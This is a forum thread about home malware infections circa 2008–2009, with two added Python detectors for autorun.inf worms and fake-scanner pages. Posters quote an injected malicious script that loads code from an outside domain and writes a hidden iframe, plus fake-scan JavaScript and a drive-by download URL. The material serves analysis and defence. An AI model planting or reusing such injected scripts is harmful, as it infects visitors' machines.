GruntyThrst posted:
I just got a good one. Typical "ATTN. WINDOWS MAY BE AT RISK CLICK HERE TO DOWNLAOD (sic) ANTI-VIRUS" popups. Atypical symptoms: whenever I run AdAware or Spybot the computer crashes to a BSOD talking about some "non registered anti-spyware" crap. I'm running a scan in safe mode now to see if that does anything. Another interesting thing, and I have no idea how it can do this, whenever I go to popular AV distributors like Norton or the AdAware/Spybot sites, even malwarebytes.org, I get redirected to some random search page like you see when a domain expires/is squatted. Also there's that lovely new desktop icon labeled "Gay Fetish Sex."

can i see your hosts file please?

e: A lot of virii do this just to prevent downloading of an AV or updates/etc?

# Dec 20, 2008 21:05
GREAT BOOK OF DICK posted:
They were 12 REGISTRY entries from atdmt.com, not cookies. Even after removing them it still loses network connectivity so I'm sure there's still something somewhere.

# Dec 23, 2008 09:15
BillWh0re posted:
Looks like it has an autorun.inf file, probably hidden, from some Chinese autorun worm on there. Most likely it got infected after you plugged it in. You'll probably find the same file on the root of every other drive, including network shares writable from that computer that are mapped to a drive letter, though perhaps not the C: drive. Symantec probably detected and removed the executable but not the autorun.inf file itself, which is what causes Explorer to show that menu.

CDs can autorun too.

# Dec 30, 2008 21:23
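A defender-side check for the autorun.inf mechanism BillWh0re describes (an added example, not code from the thread): it parses the [autorun] section tolerantly, flags directives that launch a program, and walks a list of drive roots or mapped shares, which the hidden attribute does not hide from it. The executable-extension list and both sample autorun.inf contents are constructed.

```python
import re
from pathlib import Path
# Constructed list of common Windows executable types the autorun handler can launch.
EXEC_EXT = re.compile(r"\.(exe|com|pif|scr|bat|cmd|vbs|js|wsf)\b", re.I)
LAUNCH_KEYS = ("open", "shellexecute")

def parse_autorun(text):
    """Tolerant INI parse of the [autorun] section; skips junk, NULs and comments."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.replace("\x00", "").strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries

def assess_autorun(text):
    """Return (severity, reason) findings for one autorun.inf's contents."""
    entries = parse_autorun(text)
    if not entries:
        return [("info", "no [autorun] section")]
    findings = []
    for key, value in entries.items():
        # open=, shellexecute= and shell\<verb>\command= all run a program
        launches = key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command"))
        if launches and EXEC_EXT.search(value):
            findings.append(("high", f"{key} launches {value}"))
        elif key == "shell":
            findings.append(("medium", f"default verb redirected to '{value}'"))
        elif key == "action" and "open folder" in value.lower():
            findings.append(("medium", f"action mimics Explorer: '{value}'"))
    return findings

def scan_drive_roots(roots):
    """Check each root (drive letter or mapped share) for an autorun.inf, hidden or not."""
    report = {}
    for root in roots:
        inf = Path(root) / "autorun.inf"
        if inf.is_file():
            report[str(root)] = assess_autorun(inf.read_text(errors="replace"))
    return report

# Constructed sample contents: a vendor disc vs. a worm-style autorun.inf.
BENIGN = "[autorun]\nicon=setup.exe,0\nlabel=Vendor Disc\n"
WORMLIKE = ("[AutoRun]\n;junk\x00\x00\nopen=RECYCLER\\x.exe\nshell\\open\\Command=RECYCLER\\x.exe\n"
            "shell=open\naction=Open folder to view files\n")
```

On a live machine, call scan_drive_roots with the drive letters and mapped share roots to check, e.g. ["D:\\", "E:\\", "Z:\\"].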
BillWh0re posted:
They're read only, which means they don't get infected the moment you stick them in an infected computer, which is what happens with USB sticks unless there happen to be some fancy ones that make themselves read only.

CDRW? If it was burned along with the files (dunno if any malware does this kind of insertion) - it would still infect anyways.

# Dec 30, 2008 21:37
Hillridge posted:
Same here, I got infected through a Java exploit before they patched it. The only way to be sure you never get anything is to unplug your network cable/kill wireless.

flash drives, cd's, any kind of interface that lets you talk to anything else through anything. The only way to be sure you never get anything is to not have a computer.

# Jan 3, 2009 16:55
Doc Faustus posted:
I generally assume that anyone in SH/SC is a competent computer user, so do you guys have any idea what the vector was for your infection?

Parents browsing pornography?

# Feb 19, 2009 21:35
Doc Faustus posted:
I think this is almost always the case... I work University IT, and I still see AV 2009 or whatever again and again. I think my favorite story was "I was looking at a website about macs and got a virus."

Is that virus HIV?

# Feb 20, 2009 00:38
quote:
Several online websites such as Sophos identify this trojan as “Troj/ServU-FP”; however, this variant seems to have many differences. Here is what I have gathered so far…

Dameware is usually used to keep ServU/iroffer running.

# Feb 20, 2009 18:33
Ranma4703 posted:
I saw this twice yesterday, and I've never seen it before - did a google search for something mundane (I think it was BBQ Chicken Recipes and NYU Protest), and the second result I clicked on took me to a page that was supposed to look like it was scanning my computer, and a dialog popped up that said my computer had spyware on it. I didn't give it permission to do anything, and I closed the site immediately, but is there any way I already got a virus? I'm running Windows XP SP3, and Firefox 3.0.6. I have Dreamweaver installed, but I don't think I have the pdf viewer - I use Foxit.

e: jesus christ, the thing does like 50 redirects. If your referrer isn't off a search engine, instead of redirecting you further, it'll document.write() a fake apache 404 page.

Does some activex control poo poo, possibly an exploit, not sure:

    6BF52A52-394A-11D3-B153-00C04F79FAA6 [jQuery1235412648121]

Does annoying poo poo like this, looks like a fake popup in-page (looks like it's using jquery.js, which is a compressed version, clean, of jquery):

    $(".file_scanner").html("Scan complete. 527 threats was found!");

Attempts to download a file while playing a really annoying .wav repeatedly:

    [ebd@nexus ~]$ file download.php\?affid\=04802
    download.php?affid=04802: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit

Elected by Dogs fucked around with this message at 22:01 on Feb 23, 2009

# Feb 23, 2009 21:45
liquidXenon posted:
Bonus points for Adobe: http://www.theregister.co.uk/2009/02/24/adobe_flash_vulnerability/

Bonus points for Adobe Photoshop pirates:

    127.0.0.1 whatever.host.adobe.uses.for.everything

oh my god i get virus

# Feb 25, 2009 02:22
quote:
Adobe Reader/Acrobat JBIG2 Stream Array Indexing Vulnerability

Adobe is planning to release updates to Adobe Reader and Acrobat to resolve the relevant security issue. Adobe expects to make available an update for Adobe Reader 9 and Acrobat 9 by March 11th, 2009. Adobe is planning to make updates for Adobe Reader 7 and 8, and Acrobat 7 and 8, available by March 18th.

March 11th, 2009. For something loving being actively exploited right now. Two, three weeks.

# Feb 27, 2009 04:04
Orange Juilius posted:
http://vrt-sourcefire.blogspot.com/2009/02/homebrew-patch-for-adobe-acroreader-9.html

I don't do IT for work (still a student) - I'm just shocked that something as exploitable (and being exploited already), Adobe already knows about it, the community already has a patch, and they're just arsing around.

# Feb 27, 2009 04:58
Midelne posted:
I'd be pretty drat concerned about whether I got the whole thing if it's new enough that the scanner doesn't pick it up but sloppy enough that you can just wander in and delete it, even in safe mode.

I'd be concerned that the scanner couldn't pick up something that simple...

# Feb 27, 2009 21:01
Doc Faustus posted:
I'm concerned that people would run "ecard.exe". I think if I do find someone with that, I'm going to tell them I've got an extra computer that Dell delivered by accident, and it's a really nice one, but I'll give 'em a discount on it...

Real life: gently caress off you're a scammer i'll kill you

Internet: REALLY? THIS TALKING FLASHY XBOX CONSOLE WANTS TO REMORTGAGE MY HOUSE AND ENLARGE MY PENIS AND GIVE ME A TALKING PURPLE GORILLA? *hands over ssn, cc and runs .pif*

# Feb 27, 2009 23:31
John Dough posted:
Yes, my high school used some sort of hardware device that would revert to a disk image on each reboot. This worked until people figured out the BIOS password.

deep freeze?

# Mar 2, 2009 14:39
Midelne posted:
Start up IE and hello popups.

Does IE autorestore tabs on re-execution?

# Mar 3, 2009 19:11
Cojawfee posted:
What do you mean I'm not protected?

Does that application try to force a fake XP-styled window, or are your display settings for the titlebar actually bold Verdana 10(?)?

# Mar 9, 2009 19:49
Wait, why is an office network using DHCP and getting DNS servers dynamically?

# Mar 9, 2009 22:50
Ensign Expendable posted:
I thought Java only had vulnerabilities in the early JVMs. You could always get them to run Firefox with NoScript or similar, unless your corporate policy prohibits it for some reason.

why isn't my facebook working it's not popping up that cute little window with the gradiented gray borders in the page OH I SEE ALLOW SCRIPTS GLOBALLY

# Mar 19, 2009 03:41
Cute, there's a worm/virus with mipsel shellcode and bruteforcing ddwrt/etc routers.

# Mar 24, 2009 20:08
GREAT BOOK OF DICK posted:
For those who don't know what that's about see this link. Anyone who set up a home router with these firmwares and configured it in this lovely way should be aware. They should also learn how to secure their poo poo.

Anyone smart enough to set ddwrt up shouldn't be that retarded. Though.. don't some small ISPs hand out like, custom gw/switch/routers for DSL or something that run ddw?

# Mar 25, 2009 13:00
Conficker's detectable by nmap btw:

    nmap -PN -d -p 445 --script=smb-check-vulns --script-args=safe=1 1.2.3.4

# Mar 31, 2009 13:38
BorderPatrol posted:
This site has a few "prank" programs, things like giving fake BSODs and putting the screen into powersave mode every 60 seconds.

This web site at https://www.rjlsoftware.com has been reported as an attack site and has been blocked based on your security preferences.

    <script type="text/javascript" src=http://avse2.cn>
    var ff=new ActiveXObject(flash);} catch(b){}; finally{if(b!="[object Error]"){document.write("<iframe width=111 height=111 src=f.html></iframe>");}}

Jesus christ this thing has like 300 .js iframes in iframes all obfuscated

# Sep 17, 2009 05:58
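A defender-side triage helper for the fake-scanner pages described in Ranma4703's post (referrer-gated redirects, the "threats was found" popup, the download.php drive-by) and in the script BorderPatrol found injected before </body>; this is an added example, not code from the thread. The regexes and weights are constructed heuristics, the first sample is the snippet quoted above, and the second sample is constructed.

```python
import re

# Constructed heuristics for the indicators the thread describes: an injected
# external <script>, an ActiveX probe, an iframe written via document.write(),
# referrer gating, fake scanner text and a drive-by download URL.
PATTERNS = {
    "external_script": re.compile(r"<script[^>]*\ssrc=[\"']?(https?://[^\s\"'>]+)", re.I),
    "activex_probe": re.compile(r"new\s+ActiveXObject\s*\(", re.I),
    "written_iframe": re.compile(r"document\.write\s*\([\"'].*?<iframe[^>]*\ssrc=[\"']?([^\s\"'>]+)", re.I | re.S),
    "referrer_gate": re.compile(r"document\.referrer", re.I),
    "fake_scan_text": re.compile(r"\b\d+\s+threats?\s+(?:was|were)\s+found", re.I),
    "exe_download": re.compile(r"download\.php\?[^\s\"'<>]*", re.I),
}
WEIGHTS = {"external_script": 1, "activex_probe": 2, "written_iframe": 3,
           "referrer_gate": 1, "fake_scan_text": 2, "exe_download": 3}

def triage_script(text):
    """Return {indicator: [matched values]} for every indicator present in the text."""
    hits = {}
    for name, rx in PATTERNS.items():
        # capture the URL/src where the pattern has a group, else the matched text
        found = [m.group(1) if m.groups() else m.group(0) for m in rx.finditer(text)]
        if found:
            hits[name] = found
    return hits

def risk_level(hits):
    """Sum indicator weights (once per indicator) into low / medium / high."""
    score = sum(WEIGHTS[name] for name in hits)
    return "high" if score >= 5 else "medium" if score >= 2 else "low"

# Sample 1: the injected snippet quoted in the thread. Sample 2: constructed text
# with the behaviours Ranma4703 described (fake 404 off-referrer, fake scan, download).
INJECTED = ('<script type="text/javascript" src=http://avse2.cn>\n'
            'var ff=new ActiveXObject(flash);} catch(b){}; finally{if(b!="[object Error]")'
            '{document.write("<iframe width=111 height=111 src=f.html></iframe>");}}')
FAKE_SCANNER = ('if (document.referrer.indexOf("google") < 0) { document.write("<h1>Not Found</h1>"); }\n'
                '$(".file_scanner").html("Scan complete. 527 threats was found!");\n'
                'location.href = "download.php?affid=04802";')
```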
BorderPatrol posted:
Hmm, I got that message but I looked through the source code and didn't see anything odd. I figured it was because the programs themselves are usually trapped up in antivirus programs.

It's at the bottom right below the Google Analytics code before </body>

# Sep 17, 2009 21:37